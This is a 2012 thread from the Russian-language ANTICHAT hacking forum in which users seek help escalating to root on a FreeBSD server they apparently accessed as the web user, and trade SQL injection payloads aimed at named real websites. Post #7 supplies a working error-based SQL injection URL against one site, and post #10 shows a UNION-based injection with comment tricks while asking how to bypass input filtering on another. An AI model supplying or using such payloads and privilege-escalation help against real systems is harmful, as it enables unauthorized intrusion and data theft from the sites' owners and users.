HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.09.2012, 22:41
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
Сижу на сервере под юзером WWW
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
Подскажите пожалуйста можна ли как-то повысить права или что интересного можна сделать на сервере?
Спасибо.
Пропиши в консоле uname-a и покажи что выдало.
 
Ответить с цитированием

  #2  
Старый 30.09.2012, 23:06
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию

$ uname-a

Query did not return anything
 
Ответить с цитированием

  #3  
Старый 30.09.2012, 23:09
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
$ uname-a
Query did not return anything
с пробелом надо uname -a
 
Ответить с цитированием

  #4  
Старый 30.09.2012, 23:10
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию

FreeBSD dh01.hostmedia.net 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Mon Feb 2 17:54:17 EET 2009 root@dm1.wugluskr.org:/usr/src/sys/amd64/compile/iServer amd64
 
Ответить с цитированием

  #5  
Старый 01.10.2012, 00:16
diny
Guest
Сообщений: n/a
Провел на форуме:
18364

Репутация: 0
По умолчанию

Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все?

Но что то не получается...
 
Ответить с цитированием

  #6  
Старый 02.10.2012, 01:49
Dr.Strangelove
Новичок
Регистрация: 01.12.2008
Сообщений: 26
Провел на форуме:
143670

Репутация: 10
По умолчанию

Кто поможет крутануть это дело с подзапросом (без error based)

http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68
 
Ответить с цитированием

  #7  
Старый 02.10.2012, 03:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dr.Strangelove  
Dr.Strangelove said:
Кто поможет крутануть это дело с подзапросом (без error based)
http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68
http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68+or+1+group +by+concat(version(),floor(rand(0)*2))having+min(0 )+or+1--+

идем в раздел статей и курим до утра
 
Ответить с цитированием

  #8  
Старый 02.10.2012, 07:11
0o Chris o0
Guest
Сообщений: n/a
Провел на форуме:
43360

Репутация: 0
По умолчанию

Цитата:
Сообщение от diny  
diny said:
Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все?
Но что то не получается...
Насколько я понял, уязвимость заключается в неправильной настройке доступа к данным.

Например ты хочешь прочитать .htaccess, но тебе вылетает 403. Предположим, что в этом случае передается в запросе параметр name с логином юзера, и если он равен 'admin', то доступ разрешен, если нет то 403. Так вот изменив в таком запросе свой логин на 'admin', ты получишь доступ файлу.
 
Ответить с цитированием

  #9  
Старый 02.10.2012, 23:15
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию

Помогите новичку получить root на FreeBSD 7.1-RELEASE ,не могу разобраться,спасибо.
 
Ответить с цитированием

  #10  
Старый 03.10.2012, 17:56
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию

http://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&tes timonial_id=-1%20/*!union*/%20/*!all*/%20*!select*/%20111111111,22222222,33333,bbbbbbbbb--

как обойти филтрацию? фильтруется все, кроме A-z и пробела. Даже запятые в примере выше
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ